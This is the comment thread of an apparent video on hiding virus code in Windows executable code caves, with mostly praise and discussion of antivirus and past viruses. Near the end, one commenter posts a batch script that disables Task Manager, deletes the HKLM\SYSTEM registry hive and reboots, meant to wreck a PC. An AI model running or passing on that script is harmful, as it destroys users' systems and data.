Want early access to new videos and some behind the scenes content? Consider becoming a channel member ua-cam.com/channels/QvW_89l7f-hCMP1pzGm4xw.htmljoin
Fun tip about Mcaffee... it doesn't actually check the files. All it does is notice it is new, gets a hash of it, and send it back to McAffe's servers for a determination there. this could take days.
@@AllenKll Difficult to know quite what you're saying. If you click "Scan" on an previously-unseen file, it's obviously not going to sit on "Scanning" for days while a human looks at it.
Fun fact: the notorious Chernobyl/CIH virus worked much in the way you describe: it would look for empty spaces between the executable sections and then write sections of its code into those empty spaces. Then, when an infected file was run, the virus code would reassemble those sections with some code stored between the PE header and the rest of the data. The reason the virus was so notorious was that its payload would DELETE YOUR BIOS, potentially rendering your machine unusable.
i never knew you COULD hide code in the executable without directly injecting onto the actual code well i guess im going to look into the portable executable format, seems interesting
Really interesting and informative video! Always wondered how viruses are made. It's pretty fascinating what is possible when you look below the tidy surface and overcome your default mindset of wanting things to work as expected.
This is actually how a lot of DOS viruses worked. One of the first ways to know a system file was infected was to verify the size, so if you can obfuscate your changes by injecting code into dummy data, you could hide in plain sight. And thus the cat and mouse game that is cybersecurity.
This is such a great video. A lot of folks like to play it safe and not share the "secrets" of malware development. The thing is, the information is all out there. There's nothing gained from hiding anything. The "bad guys" can find this information all over the place. More people knowing about it means more bad people can use it. . .but it also means more good people know how it works so that they can work to defend against it. As we all know, security by obscurity doesn't work.
This was very good. I read some books on Windows Internals a few years ago but never did anything as practical with the knowledge beyond normal development. Thanks for sharing!
ohh so good, this video was delightful. It enlightens clearly so many concepts, like a structured list to later later study more deeply knowing how they relate, THIS was what I most liked.
It's important to note that all the worry about ensuring the program can still execute its own code is only a concern if you're trying to create a stealthy virus that can act without alerting the user to its presence. Plenty of viruses throughout history have foregone the stealthy approach and made it obvious when the user has run an infected program.
you can flash the UEFI and patch it if there is an update available (there is) but tbh, that vuln is not a way in, they have to have a way in first to do that.
All you need to trip Windows defender is downloading and executing another executable (or sometimes executing another executable at all) - something I have to fight frequently as there are many perfectly reasonable reasons to do this :)
In Windows Defender you can chose to ignore a threat if you think it's a false positive. What this video really shows is that making a zero day exploit is very doable, that antivirus programs may only see certain injections in certain code-caves that it is actively looking for. From a personal point of view as a user and not a developer, I would like it if every system call was prompted on screen much like the "would you like to run this program, yes or no?", but it would show a window with what folder the program wants to change and what files it wants to affect, much like when you copy files and replace them in a folder. The same way Android apps asks for permissions to use location, microphone or access folders, I would like executable files to ask me for permission, and that all these syscalls and permissions would have to be reviewed before granting a program permissions to change certain folders. One of the most annoying things with any executable program, is when it changes a file, folder or registry index without telling you what it's changing. Most installers shows a list of things it wants to install and a user can opt out of optional packages by clicking a checklist. A program or game should say promptly: "We wish to add this to your %appdata% folder" or "Install additional libraries in this location". Since switching to SSDs, a lot of apps chose to install ludicrous big files in the %appdata% folder, which is stored on the OS drive, and it takes up a lot of space for no reason, (looking at you Spotify). There is literally no speed benefit of putting cache in %appdata% compared to putting it in the installation folder on a normal HDD, unless the program or game specifically benefit from loading certain files from an SSD. I find myself creating symlinks from a HDD and putting it into %appdata% folders very often, just to save on space. Until I get a 1TB SSD, I won't be allowing 20GB of cache files to just collect dust on the SSD for a program I run once in a blue moon. Thank you for a very educational video.
You can change title and thumbnail after a video has been uploaded. It’s pretty common practice to tweak a video after upload to try and maximise the number of people who click it (called Click Through Rate or CTR)
Want early access to new videos and some behind the scenes content? Consider becoming a channel member ua-cam.com/channels/QvW_89l7f-hCMP1pzGm4xw.htmljoin
New challange: infect the Antimalware service executable
Fun tip about Mcaffee... it doesn't actually check the files. All it does is notice it is new, gets a hash of it, and send it back to McAffe's servers for a determination there. this could take days.
Why would it take days?
@@eadweard. After some initial automated checks, the file can be reviewed by a real person and determined if it is a virus or not.
@@AllenKll Difficult to know quite what you're saying. If you click "Scan" on an previously-unseen file, it's obviously not going to sit on "Scanning" for days while a human looks at it.
@@eadweard. No, it doesn't find it's hash in the file DB, so it gathers information, sends it off to the mcaffee servers, and tells you it's fine.
>lemme mail this infected file to the boss, so he can check if its alright
Fun fact: the notorious Chernobyl/CIH virus worked much in the way you describe: it would look for empty spaces between the executable sections and then write sections of its code into those empty spaces. Then, when an infected file was run, the virus code would reassemble those sections with some code stored between the PE header and the rest of the data.
The reason the virus was so notorious was that its payload would DELETE YOUR BIOS, potentially rendering your machine unusable.
i never knew you COULD hide code in the executable without directly injecting onto the actual code
well i guess im going to look into the portable executable format, seems interesting
Wait, what about the code digital signature? I thought it was supposed to detect modifications.
Your content is the best. I love your vids. They are so accessible and interesting yet just detailed enough to learn something new.
Thanks!
Would be neat for a follow up video to see how you would code an antivirus for this virus
I remember learning about the Portable Executable (PE) file format writing an ELF loader for my UEFI bootloader. This is a great refresher!
Really interesting and informative video! Always wondered how viruses are made. It's pretty fascinating what is possible when you look below the tidy surface and overcome your default mindset of wanting things to work as expected.
Me watching and nodding along. Mhm mhm
I understood nothing but loved it.
Great video, very interesting! Also it’s been nice to see you grow as a content creator - the videos keep getting better and better produced.
Thanks! It's been a lot to learn but I just try to make each video better than the last
This is actually how a lot of DOS viruses worked. One of the first ways to know a system file was infected was to verify the size, so if you can obfuscate your changes by injecting code into dummy data, you could hide in plain sight.
And thus the cat and mouse game that is cybersecurity.
This is such a great video. A lot of folks like to play it safe and not share the "secrets" of malware development.
The thing is, the information is all out there. There's nothing gained from hiding anything. The "bad guys" can find this information all over the place. More people knowing about it means more bad people can use it. . .but it also means more good people know how it works so that they can work to defend against it.
As we all know, security by obscurity doesn't work.
Thanks! Yeah there’s nothing secret here, but I’m hoping it might be new and interesting to a lot of people
Love your content. Really enjoy the flow of your videos and how you walk the viewer through complex concepts.
This was quite an interesting and different video from your previous work. I'd love to see more of it!
This was very good. I read some books on Windows Internals a few years ago but never did anything as practical with the knowledge beyond normal development. Thanks for sharing!
What an underrated channel, damn!
ohh so good, this video was delightful. It enlightens clearly so many concepts, like a structured list to later later study more deeply knowing how they relate, THIS was what I most liked.
This is fasctinating and insane to me at the same time, how do people get hang of this low level stuff, seems beyond my comprehension.
It’s all written down, just learn to read documentation
yeah , it seems like a ton of complex info . There's no way I'm going to be able to incorporate it all . Some people must just have a gift for this .
It would have been nice to see a virustotal result and see how many of its AVs detect you.
plot twist: this video is a virus
Man I got got😊
It's important to note that all the worry about ensuring the program can still execute its own code is only a concern if you're trying to create a stealthy virus that can act without alerting the user to its presence. Plenty of viruses throughout history have foregone the stealthy approach and made it obvious when the user has run an infected program.
The question is, can one do something malicious to ones self?
I love it 😮 really really nice video 😍 it's awesome how easy it was dude
Easy!?
i read somewhere that now you can attack a pc from the bios logo and its nothing you can do about it!crazy
you can flash the UEFI and patch it if there is an update available (there is)
but tbh, that vuln is not a way in, they have to have a way in first to do that.
All you need to trip Windows defender is downloading and executing another executable (or sometimes executing another executable at all) - something I have to fight frequently as there are many perfectly reasonable reasons to do this :)
In Windows Defender you can chose to ignore a threat if you think it's a false positive.
What this video really shows is that making a zero day exploit is very doable, that antivirus programs may only see certain injections in certain code-caves that it is actively looking for.
From a personal point of view as a user and not a developer, I would like it if every system call was prompted on screen much like the "would you like to run this program, yes or no?", but it would show a window with what folder the program wants to change and what files it wants to affect, much like when you copy files and replace them in a folder.
The same way Android apps asks for permissions to use location, microphone or access folders, I would like executable files to ask me for permission, and that all these syscalls and permissions would have to be reviewed before granting a program permissions to change certain folders.
One of the most annoying things with any executable program, is when it changes a file, folder or registry index without telling you what it's changing. Most installers shows a list of things it wants to install and a user can opt out of optional packages by clicking a checklist. A program or game should say promptly: "We wish to add this to your %appdata% folder" or "Install additional libraries in this location".
Since switching to SSDs, a lot of apps chose to install ludicrous big files in the %appdata% folder, which is stored on the OS drive, and it takes up a lot of space for no reason, (looking at you Spotify). There is literally no speed benefit of putting cache in %appdata% compared to putting it in the installation folder on a normal HDD, unless the program or game specifically benefit from loading certain files from an SSD. I find myself creating symlinks from a HDD and putting it into %appdata% folders very often, just to save on space. Until I get a 1TB SSD, I won't be allowing 20GB of cache files to just collect dust on the SSD for a program I run once in a blue moon.
Thank you for a very educational video.
I love videos that are for educational purposes only. They are so.... educational. :)
yer a wizard harry
🧙
Another fantastic video!
this channel is so good
Love your videos!
I don't think I've ever heard anyone pronounce EXE the way you do. Made me chuckle a lil
this is a really similar concept to win32 sality it used to bytepatch exes to run itself and was a nasty bit of kit.
9:13
Does that mean that if you were to stick with .text instead of .reloc, windows wouldn't have found any threats?
Quite possibly
I really love your videos
Wait, did you reupload the video with a different thumbnail/title? I'm pretty sure I've seen it on my feed before, but I didn't actually watch it yet
You can change title and thumbnail after a video has been uploaded. It’s pretty common practice to tweak a video after upload to try and maximise the number of people who click it (called Click Through Rate or CTR)
As usual, McAfee is a total joke
And Norton; The pair also run misleading notifications that lead straight to their website; no punycode.
Do you always wear the AVGN fit in videos
I just own a lot of white (and pink) shirts
Nice video! I really like your VSCode theme, would you mind sharing your setup?
Sure - I use Dracula theme (and vim plug-in)
Always excited to watch a new video by you!
Into - if it replicates further, it's a worm :). Or, it's simply ads..
A worm triggers its own execution on other hosts. A virus relies on something else to execute it.
I have a video about worms...
Fine. I'll put down Fortnight and watch this 😂
I make no guarantee this is more interesting than Fortnight (:
I made a virus and I went to prison.
(oh how I wish I was joking)
I want to hear this story!
Hello. I like you.
Hehehe, smart. “easIER”, yet not “easY” 😅
Video was paced way too fast for me to keep up with. Would’ve been appreciated if you slowed it down and explained things a bit more.
Ps, if you want to kill a PC, put this in a bat file
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Taskkill /IM explorer.exe /F
reg add HKLM\SYSTEM\Setup /v OOBEInProgress /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\Setup /v SystemSetupInProgress /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\Setup /v SetupType /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\Setup /v SetupPhase /t REG_DWORD /d 1 /f
reg delete HKLM\SYSTEM /f
shutdown /r /t 0
and run as admin
!I AM NOT RESPONSIBLE FOR DESTORYED PCS!
!USE AT YOUR OWN RISK!